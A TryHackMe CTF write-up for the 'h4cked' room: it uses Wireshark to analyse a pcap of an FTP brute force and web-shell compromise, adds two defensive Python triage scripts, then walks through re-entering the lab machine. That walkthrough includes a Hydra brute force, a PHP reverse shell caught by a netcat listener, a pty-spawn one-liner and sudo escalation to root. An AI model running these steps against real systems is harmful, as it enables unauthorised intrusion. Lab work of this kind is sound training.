THM Writeup – h4cked

Find out what happened by analysing a .pcap file and hack your way back into the machine

Room: h4cked

Difficulty: Easy

Operating System: Linux

Author: toxicat0r

It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.

Task 1: Oh no! We’ve been hacked!

The attacker is trying to log into a specific service. What service is this?

[Screenshot: capture.pcapng – the service being targeted]

There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

Search the web for "Van Hauser tool":

[Screenshot: Van Hauser tool search result]

The attacker is trying to log on with a specific username. What is the username?

Select the first FTP packet (No. 49) > right click > Follow > TCP Stream:

[Screenshot: capture.pcapng – Follow TCP Stream]

TCP Stream:

[Screenshot: Wireshark – TCP stream]

What is the user’s password?

Look at the TCP Stream from previous question.

What is the current FTP working directory after the attacker logged in?

In the TCP Stream window click the line 230 Login successful. – this selects the corresponding packet in the main window (No. 305):

[Screenshot: Wireshark – TCP stream, packet selection]

Note the packet's length and use the following filter to display only successful logins:

ftp and frame.len==89

Select the second packet (No. 395) > right click > Follow > TCP Stream:

[Screenshot: Wireshark – TCP stream, login successful]

The attacker uploaded a backdoor. What is the backdoor’s filename?

Look at the TCP Stream from previous question.

The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

In the TCP Stream window click the line 150 Ok to send data. – this selects the corresponding packet in the main window (No. 429):

[Screenshot: Wireshark – TCP stream, packet selection 2]

Now find the closest FTP-DATA packet (No. 431) and look at the data:

[Screenshot: Wireshark – FTP-DATA packet]

Or follow the question hint ("Look at the FTP-DATA protocol") and apply the ftp-data filter:

[Screenshot: Wireshark – FTP-DATA packet 2]
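As an added example (not part of the original write-up), the Python script below summarises an FTP control-channel conversation of the kind Wireshark shows under Follow > TCP Stream: it counts failed (530) and successful (230) logins, extracts the working directory from the reply to PWD, and records every STOR upload. The sample stream is constructed for this example and uses a placeholder password; the brute-force threshold is an assumption, not something the capture defines.

```python
"""Summarise an FTP control-channel conversation (the text Wireshark shows under
Follow > TCP Stream) for signs of a brute-force login and a file upload."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed sample stream, modelled on the exchange the write-up follows.
# The password is a placeholder, not the one from the capture.
SAMPLE_STREAM = """220 Hello FTP World!
USER jenny
331 Please specify the password.
PASS 123456
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS password
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS letmein
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS <placeholder-password>
230 Login successful.
PWD
257 "/var/www/html" is the current directory
TYPE I
200 Switching to Binary mode.
STOR shell.php
150 Ok to send data.
226 Transfer complete.
QUIT
221 Goodbye.
"""

# Assumed threshold: this many failures before a success in one conversation
# is treated as a brute-force attempt (tune it to your environment).
BRUTE_FORCE_THRESHOLD = 3


@dataclass
class FtpSummary:
    usernames: Set[str] = field(default_factory=set)
    failed_logins: int = 0
    successful_logins: int = 0
    working_directory: Optional[str] = None
    uploaded_files: List[str] = field(default_factory=list)

    @property
    def looks_brute_forced(self) -> bool:
        # Repeated 530 replies followed by a 230 are the classic wordlist-attack signature.
        return self.failed_logins >= BRUTE_FORCE_THRESHOLD and self.successful_logins > 0


def analyse_ftp_stream(stream: str) -> FtpSummary:
    """Walk the stream line by line; server replies start with a 3-digit code,
    client commands do not."""
    summary = FtpSummary()
    for raw in stream.splitlines():
        line = raw.strip()
        if not line:
            continue
        upper = line.upper()
        if upper.startswith("USER "):
            summary.usernames.add(line[5:].strip())
        elif upper.startswith("PASS "):
            # Deliberately not recorded: a triage report should not carry clear-text credentials.
            continue
        elif line.startswith("530"):
            summary.failed_logins += 1
        elif line.startswith("230"):
            summary.successful_logins += 1
        elif line.startswith("257"):
            # Reply to PWD has the form: 257 "<path>" is the current directory
            match = re.search(r'"(.+?)"', line)
            if match:
                summary.working_directory = match.group(1)
        elif upper.startswith("STOR "):
            summary.uploaded_files.append(line[5:].strip())
    return summary


if __name__ == "__main__":
    result = analyse_ftp_stream(SAMPLE_STREAM)
    print(f"users tried: {sorted(result.usernames)}")
    print(f"failed/successful logins: {result.failed_logins}/{result.successful_logins}")
    print(f"working directory after login: {result.working_directory}")
    print(f"uploaded files: {result.uploaded_files}")
    print(f"brute force suspected: {result.looks_brute_forced}")
```

To run it against a real capture, paste the ASCII view of the FTP control stream (or export it with File > Export Packet Dissections) into `SAMPLE_STREAM`, or feed one stream per connection; Hydra typically opens a new connection per attempt, so aggregate the counts across streams before applying the threshold. Passwords are skipped on purpose so the summary can be shared without leaking credentials.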

Which command did the attacker manually execute after getting a reverse shell?

Find the first packet after calling /shell.php where destination port is 80 (No. 452):

[Screenshot: Wireshark – packet 452]

Right click > Follow > TCP Stream:

[Screenshot: Wireshark – TCP stream 3]

What is the computer’s hostname?

Look at the TCP Stream from previous question.

Which command did the attacker execute to spawn a new TTY shell?

Look at the TCP Stream from previous question.

Which command was executed to gain a root shell?

Scroll down a little bit in the TCP Stream from previous question:

[Screenshot: Wireshark – TCP stream 3, further down]

The attacker downloaded something from GitHub. What is the name of the GitHub project?

Look at the TCP Stream from previous question.

The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

Browse to the GitHub repository from the previous question and look at the About section.
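As an added example (not part of the original write-up), the Python script below triages the interactive shell session captured on the reverse-shell connection (Follow > TCP Stream on packet 452) for the post-exploitation steps the last six questions ask about: it reads the hostname and the sequence of users from the shell prompts, flags TTY-upgrade, user-switch and root-escalation commands, and lists any GitHub project that was cloned. The transcript is constructed for this example and the GitHub URL is a placeholder, not the project from the capture; the indicator patterns are an assumption meant to be extended.

```python
"""Triage a captured interactive shell session (the text Wireshark shows under
Follow > TCP Stream on the reverse-shell connection) for post-exploitation steps."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed transcript modelled on the write-up; the GitHub URL is a placeholder.
SAMPLE_SESSION = """whoami
www-data
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@wir3:/$ su jenny
Password:
jenny@wir3:/$ sudo su
[sudo] password for jenny:
root@wir3:/# git clone https://github.com/example-org/example-project
Cloning into 'example-project'...
"""

# Shell prompt of the form user@host:cwd$ command  (or # for root).
PROMPT_RE = re.compile(
    r'^(?P<user>[\w-]+)@(?P<host>[\w.-]+):(?P<cwd>\S+)[$#]\s?(?P<cmd>.*)$'
)

# Indicator label -> regex matched against a single command line (assumed set, extend as needed).
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "tty_upgrade": re.compile(r'pty\.spawn|script\s+/dev/null'),
    "user_switch": re.compile(r'^su\s+\S+'),
    "root_escalation": re.compile(r'^sudo\s+(su|-i|-s|bash|sh)\b'),
    "github_download": re.compile(r'https?://github\.com/\S+'),
}

GITHUB_RE = re.compile(
    r'https?://github\.com/(?P<owner>[^/\s]+)/(?P<repo>[^/\s]+?)(?:\.git)?(?:\s|$)'
)


def triage_session(transcript: str) -> dict:
    """Return hostname, users seen in prompts, matched indicators and GitHub repos."""
    findings: dict = {
        "hostname": None,          # type: Optional[str]
        "users_seen": [],          # order in which prompts showed each user
        "indicators": [],          # list of (label, command) tuples
        "github_projects": [],
    }
    for raw in transcript.splitlines():
        line = raw.rstrip()
        match = PROMPT_RE.match(line)
        if match:
            findings["hostname"] = findings["hostname"] or match.group("host")
            user = match.group("user")
            if user not in findings["users_seen"]:
                findings["users_seen"].append(user)
            cmd = match.group("cmd").strip()
        else:
            # Before the TTY upgrade there is no prompt, so every line is a command candidate;
            # command output will simply fail to match any indicator.
            cmd = line.strip()
        if not cmd:
            continue
        for label, pattern in INDICATORS.items():
            if pattern.search(cmd):
                findings["indicators"].append((label, cmd))
        repo = GITHUB_RE.search(cmd)
        if repo and repo.group("repo") not in findings["github_projects"]:
            findings["github_projects"].append(repo.group("repo"))
    return findings


if __name__ == "__main__":
    report = triage_session(SAMPLE_SESSION)
    print(f"hostname: {report['hostname']}")
    print(f"users seen: {' -> '.join(report['users_seen'])}")
    for label, cmd in report["indicators"]:
        print(f"[{label}] {cmd}")
    print(f"GitHub projects cloned: {report['github_projects']}")
```

The user sequence alone (www-data, then jenny, then root) is a compact record of the privilege-escalation chain, and the indicator list is what you would feed into an incident timeline; pasting the real stream in place of `SAMPLE_SESSION` answers the hostname, TTY, root-shell and GitHub questions in one run.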

Task 2: Hack your way back into the machine

Add the target's IP address to your hosts file:

echo '10.10.93.72    hacked.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv hacked.thm

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 21,80 hacked.thm

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

We have two ports open: 21 (FTP – File Transfer Protocol) and 80 (HTTP – Apache web server).

We know the FTP username is jenny; use Hydra to recover the password the attacker changed it to:

hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://hacked.thm

[21][ftp] host: hacked.thm   login: jenny   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found

Log in to FTP service:

root@attackbox:~# ftp hacked.thm
Connected to hacked.thm.
220 Hello FTP World!
Name (hacked.thm:root): jenny
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

List files and directories in the current directory:

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1000     1000         4096 Feb 01  2021 .
drwxr-xr-x    3 0        0            4096 Feb 01  2021 ..
-rw-r--r--    1 1000     1000        10918 Feb 01  2021 index.html
-rwxrwxrwx    1 1000     1000         5493 Feb 01  2021 shell.php
226 Directory send OK.
ftp>

shell.php is still there and is writable for our user.

Download it to your attacking machine:

ftp> get shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for shell.php (5493 bytes).
226 Transfer complete.
5493 bytes received in 0.00 secs (3.2926 MB/s)
ftp>

Open another terminal window, open the shell.php file and change the $ip and $port variables to the IP address of your attacking machine and the desired port number:

nano shell.php

For me it looks like this:

[Screenshot: shell.php configuration section]

Save the file, go back to the FTP terminal window and upload the file back to the target machine:

ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (134.3458 MB/s)
ftp>

Open another terminal window and run a netcat listener:

nc -lnvp 4242

Now open a browser and browse to http://hacked.thm/shell.php – we receive a reverse shell:

root@ip-10-10-14-175:~# nc -lnvp 4242
Listening on [0.0.0.0] (family 0, port 4242)
Connection from 10.10.93.72 49848 received!
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 08:46:17 up 22 min,  0 users,  load average: 0.00, 0.03, 0.13
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Now let's replicate the attacker's steps (we saw all of them in the stream tcp.stream eq 20: find packet No. 452 > right click > Follow > TCP Stream).

First we need to spawn a new TTY shell:

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@wir3:/$

Switch to user jenny:

www-data@wir3:/$ su jenny
su jenny
Password: [REDACTED]

jenny@wir3:/$

Since user jenny can execute all commands with sudo, we can switch to the root user:

jenny@wir3:/$ sudo su
sudo su
[sudo] password for jenny: [REDACTED]

root@wir3:/#

Read the flag.txt file:

root@wir3:/# cat /root/Reptile/flag.txt
cat /root/Reptile/flag.txt
[REDACTED]
